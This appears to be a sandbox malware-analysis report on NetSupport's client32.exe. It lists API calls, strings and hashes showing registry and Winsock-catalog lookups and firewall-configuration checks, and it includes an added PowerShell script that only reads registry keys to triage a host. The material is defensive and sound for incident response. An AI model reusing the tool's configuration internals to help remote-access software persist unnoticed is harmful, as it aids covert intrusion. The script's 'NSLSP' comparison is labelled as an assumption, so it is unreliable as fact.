• LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11112B94
• GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11112BA6
• SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11112BB9
• FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11112BC5
• CoUninitialize.COMBASE(00000000), ref: 11112C61
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
• String ID: SHELL32.DLL$SHGetSettings
• API String ID: 4195908086-2348320231
• Opcode ID: 28dcea0cc7f8a025214f6af9fd2057e380903a455cb1bbc279c23e6119f70c8b
• Instruction ID: 68fa62bcea783be6e527966318309be417962e86cfe8c7ca8d2a125abe7bdbbc
• Opcode Fuzzy Hash: 28dcea0cc7f8a025214f6af9fd2057e380903a455cb1bbc279c23e6119f70c8b
• Instruction Fuzzy Hash: 00515DB5A002169FDB04DFE5C9C4AEFFBB9FF88304F218569E615AB244D730A941CB61
APIs
• _calloc.LIBCMT ref: 685A2FBB
• GetTickCount.KERNEL32 ref: 685A300D
• InterlockedExchange.KERNEL32(?,00000000), ref: 685A301B
• _calloc.LIBCMT ref: 685A303B
• _memmove.LIBCMT ref: 685A3049
• InterlockedDecrement.KERNEL32(?), ref: 685A307F
• SetEvent.KERNEL32(00000304,?,?,?,?,?,?,?,?,?,?,?,?,?,?,97A234B3), ref: 685A308C
  • Part of subcall function 685A28D0: wsprintfA.USER32 ref: 685A2965
Strings
Memory Dump Source
• Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_68590000_client32.jbxd
Yara matches
Similarity
• API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
• String ID: a3Zh$a3Zh
• API String ID: 3178096747-1469771974
• Opcode ID: c3b386c5d1f3d419a61cc250ec1f38c9d0b35944b3ff5a5a76c454e13496c827
• Instruction ID: 34c56f1df615941f22e7a00de43ead90c8a12db29b9b1b45dd867d994322e2e9
• Opcode Fuzzy Hash: c3b386c5d1f3d419a61cc250ec1f38c9d0b35944b3ff5a5a76c454e13496c827
• Instruction Fuzzy Hash: 104137B5D00209AFDB10DFA5D885AEFB7F8FF88304F408516E915E7240E7759A458BA1
APIs
• LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,685B0F2B,25DC70BF,00000000,?,?,685CF278,000000FF,?,6859AE0A,?,00000000,?,00000080), ref: 685B0D48
• GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 685B0D5B
• GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-685DCB4C,?,?,685CF278,000000FF,?,6859AE0A,?,00000000,?,00000080), ref: 685B0D76
• _malloc.LIBCMT ref: 685B0D8C
  • Part of subcall function 685B1B69: __FF_MSGBANNER.LIBCMT ref: 685B1B82
  • Part of subcall function 685B1B69: __NMSG_WRITE.LIBCMT ref: 685B1B89
  • Part of subcall function 685B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,685BD3C1,685B6E81,00000001,685B6E81,?,685BF447,00000018,685D7738,0000000C,685BF4D7), ref: 685B1BAE
• GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,685CF278,000000FF,?,6859AE0A,?,00000000,?), ref: 685B0D9F
• _free.LIBCMT ref: 685B0D84
  • Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
  • Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25
• _free.LIBCMT ref: 685B0DAF
Strings
Memory Dump Source
• Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_68590000_client32.jbxd
Yara matches
Similarity
• API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
• String ID: GetAdaptersAddresses$IPHLPAPI.DLL
• API String ID: 1360380336-1843585929
• Opcode ID: 0793eb672395ac2a3c93fec248c92fd000900b9a54595b2b6bf680a5682af908
• Instruction ID: 42ad6cadc272536a2ff2776ff80aeab67ed087ff2e94416cc8d5ca3a43c0c877
• Opcode Fuzzy Hash: 0793eb672395ac2a3c93fec248c92fd000900b9a54595b2b6bf680a5682af908
• Instruction Fuzzy Hash: 7501D4B5240341AFE6209B709D94F6B77ACAB50B00F50481DF9669B2C0EA71F840C724
APIs
  • Part of subcall function 111419A0: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11141A10
  • Part of subcall function 111419A0: RegCloseKey.ADVAPI32(?), ref: 11141A74
• _memset.LIBCMT ref: 11141AF5
• GetVersionExA.KERNEL32(?), ref: 11141B0E
• LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
• GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
• FreeLibrary.KERNEL32(00000000), ref: 11141B5F
• GetSystemDefaultLangID.KERNEL32 ref: 11141B6A
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
• String ID: GetUserDefaultUILanguage$kernel32.dll
• API String ID: 4251163631-545709139
• Opcode ID: f4403c578d20b82e01fbdbd50243d795ec373803681fb6755249e61f6e885c6b
• Instruction ID: b52f9434772b6d6e8d8038633bf4c77d33c7f8479cfcef56ad60021fb0ce4fde
• Opcode Fuzzy Hash: f4403c578d20b82e01fbdbd50243d795ec373803681fb6755249e61f6e885c6b
• Instruction Fuzzy Hash: BE31E331F006268BD7119FB5C984BAEF7B0EB05718FA04575E928C3680E7346985CB92
APIs
• wsprintfA.USER32 ref: 110152AA
• _memset.LIBCMT ref: 110152EE
• RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015328
Strings
• NSLSP, xrefs: 11015338
• SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101522B
• PackedCatalogItem, xrefs: 11015312
• %012d, xrefs: 110152A4
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: QueryValue_memsetwsprintf
• String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
• API String ID: 1333399081-1346142259
• Opcode ID: 13c1aca20664a4fc0e133d793f1d669f9232a02ffdca666f732179c289691334
• Instruction ID: 40dd4717f0c7ad5754e433c7b85868c8d74bcde588045e86a78ebe46af68b9ce
• Opcode Fuzzy Hash: 13c1aca20664a4fc0e133d793f1d669f9232a02ffdca666f732179c289691334
• Instruction Fuzzy Hash: 01418F75D022299EEB11DF50CC94BEEF7B4EB45318F0445E8E91AA7281EB34AB44CF51
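The two client32 functions above give a responder something concrete to hunt for on a live host: one opens HKLM\SOFTWARE\Productive Computer Insight\PCICTL, the other walks the Winsock2 Protocol_Catalog9\Catalog_Entries subkeys (naming them with the %012d format), queries each PackedCatalogItem value and references the string NSLSP immediately afterwards. The script below is an added triage check written for this page, not code from the Joe Sandbox report or from NetSupport. It assumes that the sample compares the PackedCatalogItem blob against "NSLSP" (the page shows the string reference, not the comparison), and it goes slightly beyond what the page shows by also checking the WOW6432Node copy of the PCICTL key and the Catalog_Entries64 key, because client32.exe is a 32-bit image (0x11000000 base) and a 32-bit process sees a redirected view of HKLM\SOFTWARE on 64-bit Windows. Run it in an elevated PowerShell session on the host being triaged.

```powershell
# Added triage example (not from the Joe Sandbox report or from NetSupport).
# Mirrors the registry lookups seen in client32: the PCICTL configuration key and
# the Winsock catalog scan for the "NSLSP" marker. Assumptions are labelled inline.

$Marker = 'NSLSP'   # string referenced right after RegQueryValueExA; assumed to be the comparison target

# Catalog_Entries is what the sample enumerates; Catalog_Entries64 is the 64-bit
# catalog on x64 Windows and is checked here as an extension beyond the report.
$CatalogKeys = @(
    'HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries',
    'HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64'
)

# Native view plus the WOW6432Node view a 32-bit client32.exe would actually be redirected to.
$PcictlKeys = @(
    'HKLM:\SOFTWARE\Productive Computer Insight\PCICTL',
    'HKLM:\SOFTWARE\WOW6432Node\Productive Computer Insight\PCICTL'
)

function Get-WinsockCatalogHits {
    param([string[]]$Paths = $CatalogKeys, [string]$Needle = $Marker)
    $hits = @()
    foreach ($path in $Paths) {
        if (-not (Test-Path $path)) { continue }
        # Subkeys are named the way the sample formats them with "%012d", e.g. 000000000001.
        foreach ($entry in Get-ChildItem -Path $path) {
            $blob = (Get-ItemProperty -Path $entry.PSPath -Name 'PackedCatalogItem' `
                        -ErrorAction SilentlyContinue).PackedCatalogItem
            if (-not $blob) { continue }
            # PackedCatalogItem is REG_BINARY; the sample reads it raw. Decode as ASCII and
            # search the whole blob so the check does not depend on the blob's internal layout.
            $text = [System.Text.Encoding]::ASCII.GetString($blob)
            if ($text.IndexOf($Needle, [System.StringComparison]::OrdinalIgnoreCase) -ge 0) {
                $hits += [pscustomobject]@{
                    Catalog = Split-Path -Leaf $path
                    Entry   = $entry.PSChildName
                    Bytes   = $blob.Length
                }
            }
        }
    }
    return $hits
}

function Get-PcictlKeys {
    param([string[]]$Paths = $PcictlKeys)
    foreach ($path in $Paths) {
        if (Test-Path $path) {
            [pscustomobject]@{ Path = $path; Present = $true;  Values = Get-ItemProperty -Path $path }
        } else {
            [pscustomobject]@{ Path = $path; Present = $false; Values = $null }
        }
    }
}

$lsp = Get-WinsockCatalogHits
if ($lsp) { "Winsock catalog entries referencing '$Marker':"; $lsp | Format-Table -AutoSize }
else      { "No Winsock catalog entry references '$Marker'." }

foreach ($k in Get-PcictlKeys) {
    if ($k.Present) { "Present: $($k.Path)"; $k.Values | Format-List }
    else            { "Absent:  $($k.Path)" }
}
```

A hit on either check is an indicator, not a verdict: NetSupport Manager is a commercial remote-control product, so the same key and catalog entries appear on hosts where it was installed deliberately. Confirm against the process tree and network indicators elsewhere in this report before treating the host as compromised.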
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 1100FFBD
• std::_Lockit::_Lockit.LIBCPMT ref: 1100FFE0
• std::bad_exception::bad_exception.LIBCMT ref: 11010064
• __CxxThrowException@8.LIBCMT ref: 11010072
• std::_Lockit::_Lockit.LIBCPMT ref: 11010085
• std::locale::facet::_Facet_Register.LIBCPMT ref: 1101009F
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
• String ID: bad cast
• API String ID: 2427920155-3145022300
• Opcode ID: b91949114c5cc0d56ba0394389beafb177cfa03f8955ddf8c17424d389eecb5f
• Instruction ID: eb2297de3126562b7a6adfe99aab1db74979c6a8f9cac3cb144437a799ef2362
• Opcode Fuzzy Hash: b91949114c5cc0d56ba0394389beafb177cfa03f8955ddf8c17424d389eecb5f
• Instruction Fuzzy Hash: B631E635E002658FCB52CF94C880BAEF7B4FB0536CF404269E865AB298DB75AD00CB91
APIs
• GetTickCount.KERNEL32 ref: 685A6950
  • Part of subcall function 685A7BE0: _memset.LIBCMT ref: 685A7BFF
  • Part of subcall function 685A7BE0: _strncpy.LIBCMT ref: 685A7C0B
  • Part of subcall function 6859A4E0: EnterCriticalSection.KERNEL32(685DB898,00000000,?,?,?,6859DA7F,?,00000000), ref: 6859A503
  • Part of subcall function 6859A4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6859A568
  • Part of subcall function 6859A4E0: Sleep.KERNEL32(00000000,?,6859DA7F,?,00000000), ref: 6859A581
  • Part of subcall function 6859A4E0: LeaveCriticalSection.KERNEL32(685DB898,00000000), ref: 6859A5B3
Strings
Memory Dump Source
• Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
• Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                                                                                                                                                                    • String ID: 1.2$BlZh$Channel$Client$Publish %d pending services
                                                                                                                                                                                                    • API String ID: 1112461860-429780693
                                                                                                                                                                                                    • Opcode ID: 4e352527ea774d9df39beab3d12507b1a7a3a11d5491ca3cd601c78d2979097a
                                                                                                                                                                                                    • Instruction ID: 5d3ed0157c170679b21c14aa78076d12a51ce1c935d438aa56610adfde399586
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e352527ea774d9df39beab3d12507b1a7a3a11d5491ca3cd601c78d2979097a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA51AD35A043498FEF10DB7CD894BAE7BE5AB46308F910129DE6193281EB31ED45CB99
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
• SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
• SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
• String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
• API String ID: 3494822531-1878648853
• Opcode ID: 1d2eb1ac8d69a6f74e2d2292f6299ccec90df6a61e137f66e811ad89e50a1c5c
• Instruction ID: 9db0ad8c4734361e4183e08fa1cc534476f5972450c8a9aa7511e5a375f2920b
• Opcode Fuzzy Hash: 1d2eb1ac8d69a6f74e2d2292f6299ccec90df6a61e137f66e811ad89e50a1c5c
• Instruction Fuzzy Hash: 42515975E0422E5BDB12CF248C54BDDF7A4AB05B18F2441E4EC89B7681EB717A84CB92
APIs
  • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
  • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
  • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
• LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11186026,000000FF), ref: 11104373
• LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111043C2
• std::exception::exception.LIBCMT ref: 11104424
• __CxxThrowException@8.LIBCMT ref: 11104439
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: LibraryLoad$CreateEventException@8Throw_memsetstd::exception::exceptionwsprintf
• String ID: Advapi32.dll$Wtsapi32.dll
• API String ID: 1187064156-2390547818
• Opcode ID: 0e7ad8b693c498ee1e4a6f1cf957980c85518d600d03c49e45930bbad189b04a
• Instruction ID: bbbd634f828a37cff571ede067cab351b0e944a9bc0c67eb03fa8c0f48524c6c
• Opcode Fuzzy Hash: 0e7ad8b693c498ee1e4a6f1cf957980c85518d600d03c49e45930bbad189b04a
• Instruction Fuzzy Hash: 594114B5D09B449AC361CF6A8980BDAFBF8EFA9204F00494ED5AE93210D7787500CF51
APIs
• KillTimer.USER32(00000000,00000000,TermUI...), ref: 111393AA
• KillTimer.USER32(00000000,00007F2D,TermUI...), ref: 111393C3
• FreeLibrary.KERNEL32(75B40000,?,TermUI...), ref: 1113943B
• FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 11139453
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeKillLibraryTimer
                                                                                                                                                                                                    • String ID: (r$TermUI
                                                                                                                                                                                                    • API String ID: 2006562601-2801693061
                                                                                                                                                                                                    • Opcode ID: 5e01743d874b38865cae7b9e648c311240cd0068f3dd68cbc61febb588e4f90f
                                                                                                                                                                                                    • Instruction ID: bc9711c706b9d41bf1b1aa53e8d725085e588c5fb78ea17b568d689d6d6e9679
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e01743d874b38865cae7b9e648c311240cd0068f3dd68cbc61febb588e4f90f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F03158B16135349BD202DFE9CDC0A7AFBAAABC5B1C711402AF4258720CF770A841CF92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • AutoICFConfig, xrefs: 11135C10
                                                                                                                                                                                                    • DoICFConfig() OK, xrefs: 11135C96
                                                                                                                                                                                                    • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 11135CAC
                                                                                                                                                                                                    • Client, xrefs: 11135C15
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
